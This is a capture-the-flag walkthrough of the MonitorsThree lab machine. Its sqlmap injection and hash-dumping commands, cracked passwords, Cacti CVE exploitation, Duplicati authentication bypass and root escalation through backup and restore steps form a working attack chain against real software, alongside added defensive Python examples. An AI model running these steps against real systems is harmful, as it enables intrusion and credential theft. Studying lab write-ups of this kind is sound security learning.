Basic information

Port scan

22, 80, and a filtered 8084:

$ nmap -sC -sV -Pn 10.10.11.30
Starting Nmap 7.95 ( https://nmap.org ) at 2024-08-26 15:50 CST
Nmap scan report for 10.10.11.30
Host is up (0.098s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)
|_ 256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://monitorsthree.htb/
8084/tcp filtered websnp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.73 seconds

80

A hosts entry is needed:

10.10.11.30 monitorsthree.htb

Overview of the web application:

Subdomain scan

Subdomain fuzzing reveals a cacti host:

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://monitorsthree.htb/" -H 'Host: FUZZ.monitorsthree.htb' -fs 13560

cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 98ms]

cacti

After adding the hosts entry and visiting it: Cacti 1.2.26:

MonitorsThree

Neither site has registration open. Back on the main site, simple testing shows that the forgot-password page allows username enumeration (if you use Repeater, change the setting so it follows redirects):

sql

Routine testing also reveals SQL injection:

SQL injection

So go straight to sqlmap, again with follow-redirects enabled, but note that resending the POST data must be turned off:

sqlmap -r sql.txt -v 3 --level 3  --technique=B

got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] N

sqlmap -r sql.txt -v 3 --level 3 --technique=B --dbs
available databases [2]:
[*] information_schema
[*] monitorsthree_db


sqlmap -r sql.txt -v 3 --level 3 --technique=B -D monitorsthree_db --tables
Database: monitorsthree_db
[6 tables]
+---------------+
| changelog |
| customers |
| invoice_tasks |
| invoices |
| tasks |
| users |
+---------------+

sqlmap -r sql.txt -v 3 --level 3 --technique=B -D monitorsthree_db -T users --columns

sqlmap -r sql.txt -v 3 --level 3 --technique=B -D monitorsthree_db -T users -C username,password --dump

Database: monitorsthree_db
Table: users
[4 entries]
+-----------+----------------------------------+
| username | password |
+-----------+----------------------------------+
| janderson | 1e68b6eb86b45f6d92f8f292428f77ac |
| admin | 31a181c8372e3afc59dab863430610e8 |
| dthompson | 633b683cc128fe244b00f176c8a950f5 |
| mwatson | c585d01f2eb3e6e1073e92023088a3dd |
+-----------+----------------------------------+

# the admin hash cracks to this plaintext
greencacti2001
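To make the two defects of the forgot-password page concrete, here is an added Python example; it is not from the original write-up and not the MonitorsThree application's code (whose source is not shown). It places a vulnerable handler that splices the username into SQL and answers differently for known and unknown accounts beside a hardened handler that uses a parameterised query and a uniform response. The in-memory users table, the placeholder hash values, `queue_reset_email` and `RESET_QUEUE` are constructed for the example; only the usernames come from the dump above.

```python
import sqlite3

# Constructed sample data for this example: usernames from the dump above with
# placeholder (not the real) password hashes, loaded into an in-memory SQLite DB.
SAMPLE_USERS = [
    ("janderson", "placeholder-hash-1"),
    ("admin", "placeholder-hash-2"),
    ("dthompson", "placeholder-hash-3"),
    ("mwatson", "placeholder-hash-4"),
]

# Stand-in for the mail subsystem: records which accounts were sent a reset link.
RESET_QUEUE = []


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def queue_reset_email(username: str) -> None:
    # Hypothetical side effect; a real handler would send a single-use link.
    RESET_QUEUE.append(username)


def forgot_password_vulnerable(conn: sqlite3.Connection, username: str) -> str:
    # Two defects at once: the username is spliced into the SQL string
    # (injection), and the two replies differ (username enumeration).
    row = conn.execute(
        "SELECT username FROM users WHERE username = '" + username + "'"
    ).fetchone()
    if row is None:
        return "Unknown username"
    return "Reset link sent to " + row[0]


def forgot_password_hardened(conn: sqlite3.Connection, username: str) -> str:
    # Parameterised query: the driver passes the value separately, so quotes
    # and keywords in the input never become SQL syntax.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is not None:
        queue_reset_email(row[0])
    # Identical message whether or not the account exists, so the reply no
    # longer tells a caller which usernames are valid.
    return "If that account exists, a reset link has been sent"


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"
    print(forgot_password_vulnerable(db, "nobody"))
    print(forgot_password_vulnerable(db, probe))   # the tautology matches every row
    print(forgot_password_hardened(db, "nobody"))
    print(forgot_password_hardened(db, probe))     # no match, same message
```

The dump also shows why hash storage matters: the main site keeps unsalted 32-hex MD5 values, which is why the admin hash fell to a wordlist immediately, whereas the Cacti table further down uses bcrypt (`$2y$10$`) and needed hashcat mode 3200 against rockyou to recover a single weak password.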

cacti

The recovered password logs in to Cacti:

CVE-2024-25641

Searching by the Cacti version turns up the relevant vulnerability:

The msf module exploits it in one shot and lands a shell as www-data:

Information

The database connection details are then found in the usual config file:

/var/www/html/cacti/include/config.php

$database_type = 'mysql';
$database_default = 'cacti';
$database_hostname = 'localhost';
$database_username = 'cactiuser';
$database_password = 'cactiuser';

Using these credentials to inspect the database yields new hashes:

mysql -u cactiuser -pcactiuser

MariaDB [(none)]> use cacti
MariaDB [cacti]> select username,password from user_auth;
select username,password from user_auth;
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G |
| guest | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu |
| marcus | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK |
+----------+--------------------------------------------------------------+

Of these, marcus's hash can be cracked to a password:

sudo hashcat -m 3200 hash.txt ~/Tools/dict/rockyou.txt

12345678910

user flag

The recovered password is also marcus's system password, but marcus can only log in over SSH with a key, so su to marcus and then read the private key to make the later steps easier:

Duplicati & root flag

Basic enumeration finds port 8200 listening locally; forward it out to take a look:

ssh -i marcus_id_rsa marcus@10.10.11.30 -L 8200:127.0.0.1:8200

It is a Duplicati instance.

auth bypass

It requires credentials, but we can reach the related database file; following the referenced steps one by one, authentication can be bypassed:

-2||server-passphrase|Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
-2||server-passphrase-salt|xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=
-2||server-passphrase-trayicon|85f1c87b-821f-463a-9980-fbced4f2ab54
-2||server-passphrase-trayicon-hash|VnE0XrLTcUUSNnnPu3f27J1ljZqDth3wLIep9tcLPeY=


echo 'Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=' | base64 -d | xxd -p -c 256

59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a

# Log in with any password; this is the response from the first step, getnonce
{
"Status": "OK",
"Nonce": "vLqa2zmay+qOWddhPloQoheYyL83s4m8zhYlAqC7cjc=",
"Salt": "xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I="
}

# Generate the nonced password needed for the second step
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("vLqa2zmay+qOWddhPloQoheYyL83s4m8zhYlAqC7cjc=") + "59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a")).toString(CryptoJS.enc.Base64);

XDqc63oXVXI+z3o5WL4U1Np027f36z092jFsiONF8GA=
# Substitute it into the request; note the URL encoding
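To make explicit why this works, here is an added Python example, not part of the original write-up and not Duplicati's own code. It recomputes the same value as the CryptoJS one-liner above, base64(SHA256(nonce bytes || stored passphrase bytes)), and shows the check a server using this scheme has to perform: it needs only the stored `server-passphrase` row, never the password. For a defender the lesson is that read access to that database row is equivalent to knowing the admin password, so the file holding it must be protected and the passphrase rotated after any exposure. The nonce and stored value are the ones shown above; `server_verify` and `new_nonce` are this example's own functions and are assumed to mirror the server side.

```python
import base64
import hashlib
import hmac
import os

# Values from the write-up above, used here as the example's input: the nonce
# from the getnonce response and the server-passphrase row from the database.
NONCE_B64 = "vLqa2zmay+qOWddhPloQoheYyL83s4m8zhYlAqC7cjc="
STORED_PASSPHRASE_B64 = "Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho="


def nonced_password(nonce_b64: str, stored_passphrase_b64: str) -> str:
    """Same computation as the CryptoJS one-liner: the write-up first turns the
    base64 stored value into hex with xxd; decoding the base64 directly yields
    the identical bytes. Returns base64(SHA256(nonce || stored_passphrase))."""
    nonce = base64.b64decode(nonce_b64)
    stored = base64.b64decode(stored_passphrase_b64)
    digest = hashlib.sha256(nonce + stored).digest()
    return base64.b64encode(digest).decode()


def stored_value_hex(stored_passphrase_b64: str) -> str:
    """The hex form the write-up obtained with `base64 -d | xxd -p`."""
    return base64.b64decode(stored_passphrase_b64).hex()


def new_nonce() -> str:
    """Fresh 32-byte nonce, as a server would issue on getnonce (assumption)."""
    return base64.b64encode(os.urandom(32)).decode()


def server_verify(nonce_b64: str, stored_passphrase_b64: str, response_b64: str) -> bool:
    """Assumed server-side check: recompute from the *stored* value and compare
    in constant time. Nothing here needs the original password, which is why a
    leaked stored value is a password equivalent; the nonce only prevents
    replaying an old response, not use of the stored value itself."""
    expected = nonced_password(nonce_b64, stored_passphrase_b64)
    return hmac.compare_digest(expected.encode(), response_b64.encode())


if __name__ == "__main__":
    resp = nonced_password(NONCE_B64, STORED_PASSPHRASE_B64)
    print("stored value as hex:", stored_value_hex(STORED_PASSPHRASE_B64))
    print("response for the page's nonce:", resp)
    print("server accepts it:", server_verify(NONCE_B64, STORED_PASSPHRASE_B64, resp))
    later_nonce = new_nonce()
    print("same response replayed against a fresh nonce:",
          server_verify(later_nonce, STORED_PASSPHRASE_B64, resp))
```

Run stand-alone, the script prints the hex and the nonced value for the page's inputs, so both can be compared with the values shown above; the replay line shows that a new nonce defeats reuse of an old response but does nothing against a reader of the stored value.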

backup

Next, abuse Duplicati's backup feature.

Add backup -> Configure a new backup -> set a name and choose "no encryption" as the encryption option -> choose a destination as a folder path (browsing the files here shows the root filesystem mounted under source, so /source/tmp can be used directly as the destination) -> set the source data directly to /source/root/ -> untick automatic backup runs -> save with the default options, then refresh the home page, find our backup job, and select Run now

recovery

The backup runs with root privileges, which we do not have yet. Next choose to restore files from the backup; one of the steps allows the permissions to be changed:

Restore files, choose our backup -> select /root/root.txt directly, continue -> choose the location and tick restore read/write permissions -> once the restore completes, the file can be read

Writing a file

That approach read root.txt directly; the same backup-and-restore trick can also write a public key into root's home:

/source/tmp/miao1/authorized_keys -> /source/root/.ssh/authorized_keys

After the restore completes, root's /source/root/.ssh/authorized_keys has been written and SSH login works directly:

run-script

There is an even simpler way: Duplicati's advanced settings allow various run-script options, and running any job afterwards executes the script, so arbitrary commands run:

shadow

root:$y$j9T$3TDQ3GS5lSkNwiN4EsxVB/$Jyu3CWLTQ4mIypw/03JOtPle6vdpaoY/x6J9brbV9P4:19869:0:99999:7:::
marcus:$y$j9T$E2hoLeuzugmRkxli4l2tW0$yW1Z2shW601aB1eqvybmrTri2Z6X6l9Wz5IIhK89Dd2:19861:0:99999:7:::
